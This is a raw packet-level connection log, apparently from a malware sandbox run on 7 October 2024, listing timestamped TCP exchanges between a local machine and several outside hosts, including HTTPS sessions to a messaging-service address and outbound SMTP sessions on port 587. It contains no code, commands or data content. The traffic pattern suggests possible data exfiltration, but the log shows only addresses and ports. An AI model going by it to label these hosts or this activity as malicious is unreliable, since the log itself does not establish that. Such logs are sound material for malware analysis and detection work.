                                                                              Oct 7, 2024 08:51:26.101679087 CEST44349749188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:26.101959944 CEST49749443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:26.102318048 CEST49749443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:26.102336884 CEST44349749188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:26.119807005 CEST8049748132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:26.121052980 CEST49750443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:26.121088028 CEST44349750188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:26.121159077 CEST49750443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:26.121505976 CEST49750443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:26.121525049 CEST44349750188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:26.142488003 CEST4974780192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:26.173749924 CEST4974880192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:26.558281898 CEST44349749188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:26.560338974 CEST49749443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:26.560357094 CEST44349749188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:26.582220078 CEST44349750188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:26.584240913 CEST49750443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:26.584256887 CEST44349750188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:26.680329084 CEST44349749188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:26.680416107 CEST44349749188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:26.680598021 CEST49749443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:26.681000948 CEST49749443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:26.684144974 CEST4974780192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:26.685354948 CEST4975180192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:26.689155102 CEST8049747132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:26.689204931 CEST4974780192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:26.690234900 CEST8049751132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:26.690330029 CEST4975180192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:26.690434933 CEST4975180192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:26.695394039 CEST8049751132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:26.714907885 CEST44349750188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:26.715151072 CEST44349750188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:26.715224981 CEST49750443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:26.715550900 CEST49750443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:26.718925953 CEST4974880192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:26.720227957 CEST4975280192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:26.723978996 CEST8049748132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:26.724046946 CEST4974880192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:26.725027084 CEST8049752132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:26.725182056 CEST4975280192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:26.725182056 CEST4975280192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:26.729921103 CEST8049752132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:27.355006933 CEST8049751132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:27.356439114 CEST49753443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:27.356472015 CEST44349753188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:27.356542110 CEST49753443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:27.356817007 CEST49753443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:27.356831074 CEST44349753188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:27.388710022 CEST8049752132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:27.389894962 CEST49754443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:27.389906883 CEST44349754188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:27.390101910 CEST49754443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:27.390388966 CEST49754443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:27.390402079 CEST44349754188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:27.408098936 CEST4975180192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:27.439404964 CEST4975280192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:27.819473028 CEST44349753188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:27.823559046 CEST49753443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:27.823570013 CEST44349753188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:27.857903004 CEST44349754188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:27.859771013 CEST49754443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:27.859796047 CEST44349754188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:27.946655989 CEST44349753188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:27.946729898 CEST44349753188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:27.946854115 CEST49753443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:27.947356939 CEST49753443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:27.950254917 CEST4975180192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:27.951210976 CEST4975580192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:27.955343962 CEST8049751132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:27.955410957 CEST4975180192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:27.955997944 CEST8049755132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:27.956063032 CEST4975580192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:27.956156969 CEST4975580192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:27.960963011 CEST8049755132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:27.976825953 CEST44349754188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:27.977088928 CEST44349754188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:27.977180004 CEST49754443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:27.977679968 CEST49754443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:27.981232882 CEST4975680192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:27.986005068 CEST8049756132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:27.986284018 CEST4975680192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:27.986356974 CEST4975680192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:27.991102934 CEST8049756132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:28.621740103 CEST8049755132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:28.623064995 CEST49757443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:28.623095989 CEST44349757188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:28.623177052 CEST49757443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:28.623413086 CEST49757443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:28.623424053 CEST44349757188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:28.650738955 CEST8049756132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:28.664870024 CEST49758443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:28.664900064 CEST44349758188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:28.664999962 CEST49758443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:28.665219069 CEST49758443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:28.665234089 CEST44349758188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:28.673758984 CEST4975580192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:28.705004930 CEST4975680192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:29.082442045 CEST44349757188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:29.083911896 CEST49757443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:29.083925009 CEST44349757188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:29.143577099 CEST44349758188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:29.145556927 CEST49758443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:29.145572901 CEST44349758188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:29.222012043 CEST44349757188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:29.222120047 CEST44349757188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:29.222177982 CEST49757443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:29.222599983 CEST49757443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:29.225637913 CEST4975580192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:29.226994991 CEST4975980192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:29.230597973 CEST8049755132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:29.230721951 CEST4975580192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:29.231856108 CEST8049759132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:29.231930017 CEST4975980192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:29.232044935 CEST4975980192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:29.236951113 CEST8049759132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:29.280391932 CEST44349758188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:29.280648947 CEST44349758188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:29.280734062 CEST49758443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:29.281347036 CEST49758443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:29.285578966 CEST4975680192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:29.286179066 CEST4976080192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:29.290702105 CEST8049756132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:29.290774107 CEST4975680192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:29.290939093 CEST8049760132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:29.291001081 CEST4976080192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:29.291100979 CEST4976080192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:29.295839071 CEST8049760132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:29.924650908 CEST8049759132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:29.926363945 CEST49761443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:29.926404953 CEST44349761188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:29.926531076 CEST49761443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:29.926842928 CEST49761443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:29.926857948 CEST44349761188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:29.970777035 CEST4975980192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:29.989221096 CEST8049760132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:29.990627050 CEST49762443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:29.990659952 CEST44349762188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:29.990735054 CEST49762443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:29.991115093 CEST49762443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:29.991126060 CEST44349762188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:30.033116102 CEST4976080192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:30.419414997 CEST44349761188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:30.421580076 CEST49761443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:30.421597004 CEST44349761188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:30.458307028 CEST44349762188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:30.460114002 CEST49762443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:30.460129023 CEST44349762188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:30.568059921 CEST44349761188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:30.568166971 CEST44349761188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:30.568622112 CEST49761443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:30.569834948 CEST49761443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:30.583795071 CEST4975980192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:30.588973045 CEST8049759132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:30.589024067 CEST4975980192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:30.591959000 CEST49763443192.168.2.4149.154.167.220
                                                                              Oct 7, 2024 08:51:30.591993093 CEST44349763149.154.167.220192.168.2.4
                                                                              Oct 7, 2024 08:51:30.592098951 CEST49763443192.168.2.4149.154.167.220
                                                                              Oct 7, 2024 08:51:30.592551947 CEST49763443192.168.2.4149.154.167.220
                                                                              Oct 7, 2024 08:51:30.592562914 CEST44349763149.154.167.220192.168.2.4
                                                                              Oct 7, 2024 08:51:30.604511976 CEST44349762188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:30.604630947 CEST44349762188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:30.604713917 CEST49762443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:30.605268002 CEST49762443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:30.609060049 CEST4976080192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:30.610132933 CEST4976480192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:30.614057064 CEST8049760132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:30.614137888 CEST4976080192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:30.615078926 CEST8049764132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:30.615145922 CEST4976480192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:30.615340948 CEST4976480192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:30.620054007 CEST8049764132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:31.229259968 CEST44349763149.154.167.220192.168.2.4
                                                                              Oct 7, 2024 08:51:31.229332924 CEST49763443192.168.2.4149.154.167.220
                                                                              Oct 7, 2024 08:51:31.231106043 CEST49763443192.168.2.4149.154.167.220
                                                                              Oct 7, 2024 08:51:31.231112003 CEST44349763149.154.167.220192.168.2.4
                                                                              Oct 7, 2024 08:51:31.231379986 CEST44349763149.154.167.220192.168.2.4
                                                                              Oct 7, 2024 08:51:31.233011961 CEST49763443192.168.2.4149.154.167.220
                                                                              Oct 7, 2024 08:51:31.278855085 CEST8049764132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:31.279400110 CEST44349763149.154.167.220192.168.2.4
                                                                              Oct 7, 2024 08:51:31.285305977 CEST49765443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:31.285352945 CEST44349765188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:31.285417080 CEST49765443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:31.288557053 CEST49765443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:31.288574934 CEST44349765188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:31.330013037 CEST4976480192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:31.489077091 CEST44349763149.154.167.220192.168.2.4
                                                                              Oct 7, 2024 08:51:31.489139080 CEST44349763149.154.167.220192.168.2.4
                                                                              Oct 7, 2024 08:51:31.489227057 CEST49763443192.168.2.4149.154.167.220
                                                                              Oct 7, 2024 08:51:31.536443949 CEST49763443192.168.2.4149.154.167.220
                                                                              Oct 7, 2024 08:51:31.778256893 CEST44349765188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:31.781934977 CEST49765443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:31.781959057 CEST44349765188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:31.916083097 CEST44349765188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:31.916328907 CEST44349765188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:31.916393995 CEST49765443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:31.916795015 CEST49765443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:31.919869900 CEST4976480192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:31.921046972 CEST4976780192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:31.924926996 CEST8049764132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:31.925002098 CEST4976480192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:31.926002026 CEST8049767132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:31.926070929 CEST4976780192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:31.926182985 CEST4976780192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:31.931427002 CEST8049767132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:32.589632034 CEST8049767132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:32.590886116 CEST49769443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:32.590939045 CEST44349769188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:32.591023922 CEST49769443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:32.591249943 CEST49769443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:32.591265917 CEST44349769188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:32.642488003 CEST4976780192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:33.083148003 CEST44349769188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:33.092571020 CEST49769443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:33.092607021 CEST44349769188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:33.222255945 CEST44349769188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:33.222548962 CEST44349769188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:33.222609043 CEST49769443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:33.223048925 CEST49769443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:33.226959944 CEST4976780192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:33.228153944 CEST4977180192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:33.232112885 CEST8049767132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:33.232161999 CEST4976780192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:33.233104944 CEST8049771132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:33.233202934 CEST4977180192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:33.233355045 CEST4977180192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:33.238164902 CEST8049771132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:33.904340982 CEST8049771132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:33.905788898 CEST49774443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:33.905831099 CEST44349774188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:33.905963898 CEST49774443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:33.906254053 CEST49774443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:33.906267881 CEST44349774188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:33.955020905 CEST4977180192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:34.368613005 CEST44349774188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:34.381652117 CEST49774443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:34.381665945 CEST44349774188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:34.518306017 CEST44349774188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:34.518392086 CEST44349774188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:34.518440962 CEST49774443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:34.519262075 CEST49774443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:34.531627893 CEST4977180192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:34.532449961 CEST49775443192.168.2.4149.154.167.220
                                                                              Oct 7, 2024 08:51:34.532490969 CEST44349775149.154.167.220192.168.2.4
                                                                              Oct 7, 2024 08:51:34.532557011 CEST49775443192.168.2.4149.154.167.220
                                                                              Oct 7, 2024 08:51:34.533216953 CEST49775443192.168.2.4149.154.167.220
                                                                              Oct 7, 2024 08:51:34.533230066 CEST44349775149.154.167.220192.168.2.4
                                                                              Oct 7, 2024 08:51:34.537988901 CEST8049771132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:34.538284063 CEST4977180192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:35.140113115 CEST44349775149.154.167.220192.168.2.4
                                                                              Oct 7, 2024 08:51:35.140204906 CEST49775443192.168.2.4149.154.167.220
                                                                              Oct 7, 2024 08:51:35.142267942 CEST49775443192.168.2.4149.154.167.220
                                                                              Oct 7, 2024 08:51:35.142278910 CEST44349775149.154.167.220192.168.2.4
                                                                              Oct 7, 2024 08:51:35.142565012 CEST44349775149.154.167.220192.168.2.4
                                                                              Oct 7, 2024 08:51:35.145006895 CEST49775443192.168.2.4149.154.167.220
                                                                              Oct 7, 2024 08:51:35.187408924 CEST44349775149.154.167.220192.168.2.4
                                                                              Oct 7, 2024 08:51:35.402009964 CEST44349775149.154.167.220192.168.2.4
                                                                              Oct 7, 2024 08:51:35.402091980 CEST44349775149.154.167.220192.168.2.4
                                                                              Oct 7, 2024 08:51:35.402147055 CEST49775443192.168.2.4149.154.167.220
                                                                              Oct 7, 2024 08:51:35.412548065 CEST49775443192.168.2.4149.154.167.220
                                                                              Oct 7, 2024 08:51:36.857763052 CEST4973780192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:37.127486944 CEST50126587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:51:37.132446051 CEST5875012668.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:37.132524967 CEST50126587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:51:37.745800972 CEST5875012668.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:37.746129990 CEST50126587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:51:37.750977993 CEST5875012668.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:37.895740986 CEST5875012668.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:37.904886961 CEST50126587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:51:37.909885883 CEST5875012668.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:38.054722071 CEST5875012668.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:38.056350946 CEST50126587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:51:38.061130047 CEST5875012668.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:38.209263086 CEST5875012668.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:38.209459066 CEST50126587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:51:38.214220047 CEST5875012668.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:38.358776093 CEST5875012668.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:38.360194921 CEST50126587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:51:38.364933968 CEST5875012668.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:38.519470930 CEST5875012668.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:38.519705057 CEST50126587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:51:38.524507046 CEST5875012668.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:38.669209003 CEST5875012668.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:38.670011997 CEST50126587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:51:38.670079947 CEST50126587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:51:38.670263052 CEST50126587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:51:38.670263052 CEST50126587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:51:38.670322895 CEST50126587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:51:38.674921036 CEST5875012668.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:38.674932957 CEST5875012668.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:38.675030947 CEST5875012668.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:38.675142050 CEST5875012668.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:38.675246954 CEST5875012668.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:38.675275087 CEST5875012668.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:38.675292969 CEST5875012668.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:38.887080908 CEST5875012668.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:38.939425945 CEST50126587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:51:40.687064886 CEST4975280192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:40.831206083 CEST50127587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:51:40.836162090 CEST5875012768.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:40.836281061 CEST50127587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:51:41.383819103 CEST5875012768.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:41.386785984 CEST50127587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:51:41.391576052 CEST5875012768.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:41.537774086 CEST5875012768.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:41.538089991 CEST50127587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:51:41.542860985 CEST5875012768.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:41.689100027 CEST5875012768.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:41.689819098 CEST50127587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:51:41.694539070 CEST5875012768.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:41.850684881 CEST5875012768.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:41.850966930 CEST50127587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:51:41.856331110 CEST5875012768.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:42.001827002 CEST5875012768.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:42.002300024 CEST50127587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:51:42.007508993 CEST5875012768.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:42.163007975 CEST5875012768.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:42.163177013 CEST50127587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:51:42.168211937 CEST5875012768.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:42.313908100 CEST5875012768.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:42.314759016 CEST50127587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:51:42.314944029 CEST50127587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:51:42.314979076 CEST50127587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:51:42.315036058 CEST50127587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:51:42.315093040 CEST50127587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:51:42.319700956 CEST5875012768.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:42.319777966 CEST5875012768.66.224.41192.168.2.4
